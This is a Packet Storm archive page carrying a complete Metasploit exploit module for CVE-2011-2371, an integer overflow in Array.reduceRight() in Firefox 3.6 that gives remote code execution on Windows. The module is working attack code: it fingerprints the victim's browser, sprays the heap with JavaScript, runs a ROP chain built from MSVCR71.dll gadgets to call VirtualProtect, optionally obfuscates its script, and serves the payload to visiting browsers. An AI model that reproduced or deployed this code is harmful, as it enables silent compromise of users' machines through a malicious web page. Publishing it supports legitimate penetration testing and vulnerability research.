what you don't know can hurt you

Mozilla Firefox Array.reduceRight() Integer Overflow

Mozilla Firefox Array.reduceRight() Integer Overflow
Posted Oct 14, 2011
Authored by Chris Rohlf, Matteo Memelli, sinn3r, dookie2000ca, Yan Ivnitskiy | Site metasploit.com

This Metasploit module exploits a vulnerability found in Mozilla Firefox 3.6. When an array object is configured with a large length value, the reduceRight() method may cause an invalid index being used, allowing arbitrary remote code execution. Please note that the exploit requires a longer amount of time (compared to a typical browser exploit) in order to gain control of the machine.

tags | exploit, remote, arbitrary, code execution
advisories | CVE-2011-2371
MD5 | 8f671993e315b396062e0dd7604ee0b8

Mozilla Firefox Array.reduceRight() Integer Overflow

Change Mirror Download
##
# $Id: mozilla_reduceright.rb 13909 2011-10-13 03:16:15Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking

include Msf::Exploit::Remote::HttpServer::HTML

def initialize(info={})
super(update_info(info,
'Name' => "Mozilla Firefox Array.reduceRight() Integer Overflow",
'Description' => %q{
This module exploits a vulnerability found in Mozilla Firefox 3.6. When an
array object is configured with a large length value, the reduceRight() method
may cause an invalid index being used, allowing abitrary remote code execution.
Please note that the exploit requires a longer amount of time (compare to a
typical browser exploit) in order to gain control of the machine.
},
'License' => MSF_LICENSE,
'Version' => "$Revision: 13909 $",
'Author' =>
[
'Chris Rohlf', #Matasano Security (Initial discovery according to Mozilla.org)
'Yan Ivnitskiy', #Matasano Security (Initial discovery with Chris?)
'Matteo Memelli', #PoC from Exploit-DB
'dookie2000ca', #"Helping" ryujin (Matteo)
'sinn3r', #Metasploit
],
'References' =>
[
['CVE', '2011-2371'],
['URL', 'http://http://www.exploit-db.com/exploits/17974/'],
['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=664009']
],
'Payload' =>
{
'BadChars' => "\x00",
'PrependEncoder' => "\xbc\x0c\x0c\x0c\x0c",
},
'DefaultOptions' =>
{
'ExitFunction' => "process",
'InitialAutoRunScript' => 'migrate -f',
},
'Platform' => 'win',
'Targets' =>
[
#Windows XP / Vista / 7
[ 'Mozilla Firefox 3.6.16', {} ],
],
'Privileged' => false,
'DisclosureDate' => "Jun 21 2011",
'DefaultTarget' => 0
))

register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
], self.class)
end

def junk
return rand_text_alpha(4).unpack("L")[0].to_i
end

def on_request_uri(cli, request)

agent = request.headers['User-Agent']
if agent !~ /Firefox\/3\.6\.[16|17]/
vprint_error("This browser is not supported: #{agent.to_s}")
send_not_found(cli)
return
end

#mona.py tekniq! + Payload
rop = [
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0x7c37a140, # Make EAX readable
0x7c37591f, # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)
0x7c348b06, # EBP (NOP)
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0x7c37a140, # <- VirtualProtect() found in IAT
0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)
0x7c346c0b, # Slide, so next gadget would write to correct stack location
0x7c376069, # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)
0x7c348b06, # EDI (filler)
0x7c348b06, # will be patched at runtime (VP), then picked up into ESI
0x7c348b06, # EBX (filler)
0x7c376402, # POP EBP # RETN (msvcr71.dll)
0x7c345c30, # ptr to push esp # ret (from MSVCR71.dll)
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0xfffff82f, # size 20001 bytes
0x7c351e05, # NEG EAX # RETN (MSVCR71.dll)
0x7c354901, # POP EBX # RETN (MSVCR71.dll)
0xffffffff, # pop value into ebx
0x7c345255, # INC EBX # FPATAN # RETN (MSVCR71.dll)
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)
0x7c34d201, # POP ECX # RETN (MSVCR71.dll)
0x7c38b001, # RW pointer (lpOldProtect) (-> ecx)
0x7c34b8d7, # POP EDI # RETN (MSVCR71.dll)
0x7c34b8d8, # ROP NOP (-> edi)
0x7c344f87, # POP EDX # RETN (MSVCR71.dll)
0xffffffc0, # value to negate, target value : 0x00000040, target: edx
0x7c351eb1, # NEG EDX # RETN (MSVCR71.dll)
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0x90909090, # NOPS (-> eax)
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)
].pack('V*')

table = [0x4141].pack('v*')
table << [
0x0c000048,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
].pack('V*')
table << [0x4141].pack('v*')
table << [
0x7c370eef,
junk,
].pack('V*')
table << [0x4141].pack('v*')
table << [
0x3410240c,
0x0c00007c,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
0x0c00002e
].pack('V*')

p = payload.encoded
arch = Rex::Arch.endian(target.arch)
js_payload = Rex::Text.to_unescape(rop + p, arch)
js_ptrs = Rex::Text.to_unescape(table, arch)

#Pretty much based on Matteo's code except for the size adjustment to avoid a busted heap
js = <<-JS
var applet = document.getElementById('MyApplet');

function spray() {
var ptrs = unescape("#{js_ptrs}");

var bheader = 0x12/2;
var nullt = 0x2/2;

var espoffset = (7340 /2) - ptrs.length;
var esppadding = unescape("%u0c0c%u0c0c");
while(esppadding.length < espoffset) esppadding += esppadding;
esppadding = esppadding.substring(0, espoffset);

var payload = unescape("#{js_payload}");

var tr_padding = unescape("%u0c0c%u0c0c");
while (tr_padding.length < 0x7fa00) {tr_padding += tr_padding;}

var dummy = ptrs + esppadding + payload + tr_padding;
var hspray = dummy.substring(0,0x7fa00 - bheader - nullt);

HeapBlocks = new Array()
for (i=0;i<0x60;i++){
HeapBlocks[i] += hspray;
}
}
spray();
obj = new Array;
obj.length = 2197815302;
f = function trigger(prev, myobj, indx, array) {
alert(myobj[0]);
}
obj.reduceRight(f,1,2,3);
JS

js = js.gsub(/^\t\t/, '')

if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate
end

html = <<-HTML
<html>
<head>
</head>
<body>
<APPLET id="MyApplet" code="trigger.class" width=150 height=50>
You need a Java-enabled browser to pwn this.
</APPLET>
<script>
#{js}
</script>
</body>
<html>
HTML

print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end
Login or Register to add favorites

File Archive:

June 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    35 Files
  • 2
    Jun 2nd
    14 Files
  • 3
    Jun 3rd
    40 Files
  • 4
    Jun 4th
    22 Files
  • 5
    Jun 5th
    1 Files
  • 6
    Jun 6th
    1 Files
  • 7
    Jun 7th
    19 Files
  • 8
    Jun 8th
    14 Files
  • 9
    Jun 9th
    39 Files
  • 10
    Jun 10th
    20 Files
  • 11
    Jun 11th
    22 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close